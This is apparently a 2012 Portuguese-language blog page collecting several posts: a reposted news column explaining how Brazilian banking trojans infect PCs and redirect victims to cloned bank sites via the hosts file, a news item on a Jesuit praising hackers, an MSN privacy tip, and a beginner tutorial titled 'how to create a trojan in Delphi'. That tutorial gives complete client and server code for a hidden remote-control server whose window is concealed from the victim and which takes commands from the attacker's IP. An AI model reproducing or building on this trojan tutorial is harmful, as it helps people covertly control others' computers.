13 de mai. de 2012

Saiba como funcionam os vírus que roubam senhas de banco!

Colunista explica ‘bankers’, da infecção até roubo de dados bancários.
Seção de comentários está aberta para dúvidas sobre segurança.
Os códigos maliciosos mais comuns da internet brasileira são os “bankers” – pragas digitais que roubam principalmente as senhas de acesso aos serviços de  internet banking. A palavra “banker” é uma variação dos termos “cracker” e “hacker”: assim como o “phreaker” é especializado no sistema telefônico e o “carder” em cartões de crédito, o “banker” se especializa em bancos. Como funciona o ataque de um “banker”, da infecção do sistema até o roubo das informações bancárias? Esse é o assunto da coluna Segurança para o PC de hoje.
Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados, etc), vá até o fim da reportagem e utilize a seção de comentários. A coluna responde perguntas deixadas por leitores todas as quartas-feiras.
Disseminação
A maioria dos bankers pode ser considerada um “cavalo de troia”, ou seja, eles não se espalham sozinhos. Quem dissemina a praga é o próprio criador do vírus e, uma vez instalado no sistema da vítima, o código malicioso tentará apenas roubar as credenciais de acesso e não irá se espalhar para outros sistemas. Existem exceções: alguns desses vírus conseguem se espalhar por Orkut e MSN, por exemplo.
Mesmo que o vírus consiga se espalhar sozinho, ele precisa começar em algum lugar. Tudo geralmente começa em um e-mail.
Virus banker para hackear senha de bancos
O vírus acima será chamado de “banker telegrama” por causa da isca utilizada pelos fraudadores. Essa tela de confirmação de download aparece assim que o internauta tenta acessar o link oferecido no e-mail malicioso. Nesse caso, o e-mail diz ser um telegrama. É possível verificar que o endereço do site não tem nenhuma relação com “telegrama”, mas o nome do arquivo, sim.
Os criminosos também podem invadir algum site conhecido para infectar os visitantes. Isso já aconteceu com o site das operadoras Vivo e Oi e com o time de futebol São Paulo FC.
Neste final de semana, foi a vez do site da fabricante de bebidas AmBev sofrer um ataque. Quem visitou o site correu o risco de ver a mensagem na foto abaixo e, se clicasse em run, ser infectado. Essa praga será referida mais adiante como “banker applet” devido à técnica de contaminação usada – a janela intitulada “Security Warning” (“Aviso de Segurança”) pede a confirmação da execução  do que se chama de “applet”no jargão técnico, mas que é na verdade um programa quase normal. “Run” significa “rodar”ou “executar”. Ao dar um único clique em “run”, o internauta está efetivamente executando um software no PC que, nesse caso, é um vírus.
Procurada pelo G1, a empresa se pronunciou via assessoria de imprensa. “A AmBev informa que a segurança de seus sites e servidores é constantemente monitorada e reforçada. Tão logo detectamos a ocorrência tomamos as medidas necessárias para solucioná-la, sem quaisquer outros desdobramentos.”
Site AmBEV virus banker
Em entrevista ao G1, um especialista da empresa antivírus Kaspersky informou que o conhecimento dos hackers brasileiros era de “nível técnico”. Os meios de infecção mostrados acima são realmente muito simples.
Um ataque avançado poderia ter contaminado o computador de teste usado pela coluna sem a necessidade de autorizar o download, porque o sistema estava desatualizado e com diversas brechas de segurança passíveis de exploração. Mais adiante será possível ver outros deslizes técnicos dos golpistas.
Infecção
icone real do adobe reader virus banker
A grande maioria dos vírus brasileiros é muito simples: resumem-se a um ou dois arquivos no disco rígido, executados automaticamente quando o sistema é iniciado. Quem puder identificar os arquivos e apagá-los terá um sistema novamente limpo. Existem algumas pragas bem mais sofisticadas, mas não são muito comuns.
No caso do Banker Telegrama, o vírus se instala numa pasta chamada “Adobe” em “Arquivos de Programas” com o nome “AcroRd32.scr”, numa clara tentativa de se passar pelo Adobe Reader (que tem exatamente o mesmo nome, mas com extensão “.exe” e fica em outra pasta).
Mas os golpistas esqueceram de trocar o ícone. O ícone usado pelo vírus é padrão de aplicativos criados na linguagem de programação Delphi, muito utilizada pelos programadores brasileiros (tanto de softwares legítimos como vírus).
Arquivo hosts alterado para redirecionar paginas a um devido ip!
Já o Banker do Applet foi mais cuidadoso: o arquivo malicioso copiou-se para a pasta “system”, dentro da pasta Windows. O nome de arquivo utilizado foi “wuaucldt.exe” – um ‘D‘ a mais do que o arquivo legítimo do Windowswuauclt.exe‘, responsável pelas atualizações automáticas. O ícone também foi trocado para ser idêntico ao do arquivo do sistema operacional.
Roubo de dados
Depois que o vírus está alojado no PC, ele precisa roubar os dados do internauta de alguma forma. As técnicas são várias. Algumas pragas mais antigas fechavam o navegador web no acesso ao banco e abriam outro navegador, falso, que iria roubar os dados.
Hoje, as técnicas mais comuns são o monitoramento da janela e o redirecionamento malicioso. Cada praga analisada pela coluna usou uma delas.
No caso do redirecionamento, o que ocorre é uma alteração no arquivo ‘hosts‘ do Windows.  Ele permite que o usuário defina um endereço que será acessado quando um site for solicitado. O que a praga faz é associar endereços falsos aos sites de instituições financeiras.
Quando um endereço de um banco é acessado, a vítima cai em uma página clonada. Esse acesso é visto e controlado pelos criminosos. Se o usuário realizar o login no serviço de internet banking pela página falsa, os dados da conta e a senha cairão nas mãos dos fraudadores.
Aqui é possível perceber outros descuidos técnicos dos golpistas: o site clonado apresenta erros, como por exemplo de “página não encontrada”. A reportagem usa como exemplo a página clone do Banco do Brasil, mas esse vírus redireciona vários outros bancos, e todas as páginas clonadas têm problemas semelhantes.
site banco do brasil
Site verdadeiro e falso do banco do brasil que bankers usam!
O site falso também não possui certificado SSL, portanto não apresentou o “cadeado de segurança” que tanto é divulgado nas campanhas de segurança das instituições financeiras. Os criminosos poderiam ter incluído um cadeado falso sem grande dificuldade – o fato que não o fizeram mostra ou que são incompetentes ou que os usuários que caem nesses golpes não tomam as mínimas precauções contra fraudes on-line.
site de antivirus bloqueados por bankers
Por outro lado, o vírus bloqueia – também com o arquivo hosts – sites técnicos e úteis, como o “virustotal.com”, usado para realizar exames antivírus, e o Linha Defensiva – página mantida por este colunista do G1.
O banker do telegrama, por sua vez, silenciosamente monitora o acesso ao internet banking, capturando as informações e as enviando aos seus criadores. Em alguns casos, ele pode alterar as páginas dos bancos para solicitar informações que vão além do que normalmente é necessário para o acesso. Esse tipo de praga é mais complexo: o vírus tem 3,2 megabytes, contra apenas pouco mais de 400 KB do banker do Applet. Apesar do tamanho reduzido, o número de alvos é maior.
A simplicidade dos roubos por meio de redirecionamento é atraente para os golpistas, que tem utilizado a técnica com uma frequência cada vez maior. Alguns especialistas em segurança se referem a esse tipo de ataque como “banhost”. Os termos ‘Qhost‘ e ‘pharming‘ também são usados.
Outros métodos
Os criminosos têm à sua disposição outras maneiras de roubar dados financeiros, como por exemplo a criação de páginas clonadas que apresentam formulários solicitando diretamente as informações do correntista. Esse tipo de golpe é muito comum no mundo todo, mas nem tanto no Brasil, onde muitas pragas digitais são desenvolvidas apenas para a realização de fraudes bancárias. A coluna de hoje buscou explicar apenas um tipo de golpe – o dos cavalos de troia.
Fonte: G1

Padre diz que hackers estão em missão divina

Biblia O padre jesuíta Antonio Spadaro publicou um texto na revista La Civiltà Cattolica  elogiando os hackers, as wikis e os softwares de código aberto. Na publicação, o clérigo diz que as pessoas que trabalham em codificações, aperfeiçoamento de hardware e compartilhamento de conhecimento estão em uma missão divina.
Spadaro explica que não podemos confundir hackers com crackers. “Hackers constroem coisas, crackers quebram-nas”, comentou o autor ao relacionar a cultura e ética hacker com os ensinamentos do cristianismo.
Para o jesuíta, a filosofia hacker é descontraída, porém comprometida, estimula a criatividade e se opõe aos modelos de controle, concorrência e propriedade privada. “A mentalidade hacker implica utilização divertida da inteligência para solucionar problemas, rejeitando o conceito de trabalho repetitivo, pesado e estúpido”, escreveu Antonio Spadaro.
O modelo de compartilhamento de conhecimento impulsionado pela Wikipédia foi outro tema muito abordado pelo clérigo. Segundo ele, esse é um exemplo de rede intelectual que foi capaz de transformar a própria ideia de produção cultural.
“Para criar a maior enciclopédia colaborativa da internet, estima-se que foram gastas cerca de 100 milhões de horas de trabalho intelectual, que é o equivalente ao tempo que os cidadãos dos EUA passam vendo publicidade na TV em um único fim de semana”, comentou o padre jesuíta.

Poisé agora quando min falarem que sou mal^^
vou diser assim...
Sou a Vassoura Que Deus Deixou Na TERRA !!!
huahauah

Como criar um trojan em delphi!

Como montar um trojan em Delphi sem saber nada.
Bom galera, vou ensinar a cada como fazer um trojan, em Delphi, mesmo se você baixou o Delphi ontem você vai conseguir fazer esse trojan… É assim… Este é um trojan básico…
1º Passo -> Você tem o Delphi? Se não, será necessário baixá-lo.
2º Passo -> Abra o Delphi. Clique em Component, depois em vá em Install Packages…
criando trojan em delphi.
Depois cliques em Add….
criando trojan em delphi.
Em Filename coloque isso e depois clique em Open:
%programfiles%\Borland\Delphi7\Bin\dclsockets70.bpl
criando trojan em delphi.
Ou o diretório do seu delphi + \Bin\dclsockets70.bpl. Isso serve para adicionar os componentes que serão necessarios para seu Trojan…
3º Passo -> Agora mãos a obra! Vá na paleta Standard e adicione 4 Buttons
criando trojan em delphi.
Agora… insira um Edit que está na paleta Standard também
criando trojan em delphi.
Depois insira um ClientSocket que está na paleta Internet.
criando trojan em delphi.
Clique em um dos botões, e na parte esquerda, procure pela janela que o titulo é Object Inspector e depois procure por Caption.
criando trojan em delphi.
E altere o conteudo da sua direita para Conectar, repita isso com os outros três botões, só que ao invés de colocar Conectar, coloque:
Desconectar, Abrir CD e Fechar CD.
Agora clique no Edit e vá na mesma janela anterior, só que dessa vez procure por Text. E remove o conteúdo da direita.
criando trojan em delphi.
De uma arrumada na posição dos objetos a seu gosto… E lembresse, o Client Socket não vai aparecer… Eu arrumei assim:
criando trojan em delphi.
4º Passo -> Agora que já fizemos a interface do Cliente, vamos codar! De dois cliques no botão Conectar. Abrirá uma nova janela, nela… escreva abaixo de begin isso:
ClientSocket1.Host := Edit1.Text;
ClientSocket1.Port := 1234;
ClientSocket1.Active := True;

criando trojan em delphi.
Explicando… a primeira linha… vai definir o IP que você vai atacar, como o texto do edit que você inseriu, a segunda linha, vai definir como a porta a ser aberta, como 1234, e a terceira se conectará.
Agora vá a janela anterior… E de dois cliques no botão Desconectar, e coloque isso:
ClientSocket1.Active := False;
ClientSocket1.Close;

criando trojan em delphi.
Explicando… a primeira linha… vai desconectar o Cliente do servidor, e a segunda… vai fechar o cliente.
Volte a janela anterior e dê dois cliques no botão Abrir CD, e coloque isso:
ClientSocket1.Socket.SendText('1');
criando trojan em delphi.
Explicando… essa linha fará com que o Client Socket, envie o texto com o número 1 para o servidor, e lá, esse texto será reconhecido…
Volte novante a janela anterior, dê dois cliques no botão Fechar CD, e coloque isso:
ClientSocket1.Socket.SendText('2');
criando trojan em delphi.
Explicando… ele faz a mesma coisa que o comando anterior, só que, ao invés de mandar um texto com o número 1 ele vai mandar um texto com o número 2.
Pronto cliente terminado,agora só falta o Server, então salve o programa clicando em File, depois em Save all e salve aonde você quiser.
criando trojan em delphi.
Depois que salvar clique em Project depois Compile Project1
criando trojan em delphi.
Depois clique em File, depois Close All
criando trojan em delphi.
Clique em File, depois New, depois Application
criando trojan em delphi.
Vá na paleta Internet e de dois cliques em ServerSocket
criando trojan em delphi.
Agora de um clique nele, e vá na janela Object Inspector, e mude a Port para 1234
criando trojan em delphi.
Agora, ainda na Object Inspector, mude o Active para True
criando trojan em delphi.
Novamente em Object Inspector, clique em Events
criando trojan em delphi.
Depois de dois cliques em OnClientRead
criando trojan em delphi.
Na nova janela que apareceu, apague o begin e coloque isso:
var
Kingcaio : String;
begin
Kingcaio := Socket.ReceiveText;
if Kingcaio = '1' then
MciSendString('Set CdAudio Door Open',nil,0,Handle)
else if Kingcaio = '2' then
MciSendString('Set CdAudio Door Closed',nil,0,Handle);


Explicando… A 2ª linha vai definir a variante Kingcaio como uma string, a 4ª define a String Kingcaio como sendo igual a Socket.ReceiveText, que por sua vez significa ao texto recebido, a 5ª vai dizer tipo assim: “Se o texto recebido for igual a 1 faça isso, mas se não for siga em frente”, a 6ª é o comando para abrir o CD-ROM, a 7ª linha tem a mesma função que a 5ª linha, e por final a 8ª linha, é o comando para fechar o CD ROM.
——————————————————————————————————————————————————-
Agora… ainda nessa janela suba a barra de rolagem até achar alguma coisa assim:
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ScktComp;

Logo após de ScktComp coloque MMSystem ficando igual a seguinte foto:
criando trojan em delphi.
——————————————————————————————————————————————————-
Certo… clique em Project depois em View Source, aparecerá uma nova janela, procure por Application.Initialize;, escreva logo abaixo dessa linha isto:
Application.ShowMainForm := False;
Que servirá para que a pessoa não veja a janela…
criando trojan em delphi.
——————————————————————————————————————————————————-
Agora clique em File e depois em Save All e salve em qualquer lugar…
criando trojan em delphi.
——————————————————————————————————————————————————-
Logo em seguida clique em Project em seguida Compile Project1.
criando trojan em delphi.
——————————————————————————————————————————————————-
Pronto! Acabou! Agora vamos testar para ver se deu certo! Dê dois cliques no executável do server, depois no executavel do cliente, no edit que você inseriu coloque isso:
127.0.0.1
Que é o endereço de LoopBack, ou seja, é a mesma coisa que se você digitasse seu próprio IP, e logo em seguida clique em Conectar, e teste os comandos… Deu certo? Acho que sim!
Espero que tenham gostado… Comentem!^^


Impeça que seus amigos saibam quando você está digitando uma mensagem no MSN

Apesar de ser uma ótima solução para conversação online, o MSN Messenger  possui, por motivos óbvios, algumas falhas de comunicação decorrentes da impessoalidade. Se você utiliza o mensageiro da Microsoft, provavelmente já foi mal interpretado ou não compreendeu uma mensagem por ela não estar acompanhada das entonações e expressões com as quais estamos acostumados no dia a dia.
Outro recurso que, apesar de muito útil em algumas horas, também impede uma comunicação plena é o famoso “Fulano está digitando uma mensagem”. Graças a esse aviso, muitas vezes os interlocutores de uma conversa ficam parados esperando que o outro termine de digitar a sua mensagem, o que impede que a conversa flua naturalmente. Além disso, por motivos diversos, você pode não querer que a outra pessoa saiba quando você está digitando algo.
Pensando nisso, o TechTudo elaborou esta dica, onde você aprenderá a impedir que seus contatos saibam quando você está digitando uma mensagem. Descubra como com o passo a passo a seguir.
Passo 1. Encerre completamente o MSN Messenger, inclusive o ícone da barra de tarefas.
Passo 2. Baixe e instale o Messenger Discovery em seu computador.
Passo 3. Execute o Windows Live Messenger e entre com a sua conta de usuário.

Messenger Discovery

Passo 4. No canto inferior direito da janela principal do MSN, clique sobre o ícone do Messenger Discovery (um balão colorido) e selecione a opção “Configurações” (ou settings, em inglês).
Passo 5. Na coluna de menus à esquerda, clique na opção “Mensagens” e, na aba “Geral”, marque a opção “Não mostrar que estou digitando uma mensagem”.

Messenger Discovery
 
Passo 6. Clique em “OK” para salvar a alteração e fechar a janela de configuração.
Agora, durante uma conversação, seus amigos não serão capazes de saber quando você está digitando uma mensgem. Isso pode te ajudar a ganhar tempo para pensar em uma resposta ou a enviar um texto sem que a outra pessoa espere recebê-lo. As demais funcionalidades desta dica são por sua conta.
Fonte: Techtudo

Related Posts Plugin for WordPress, Blogger...
http://img88.imageshack.us/img88/9519/postagensantigassw5.gif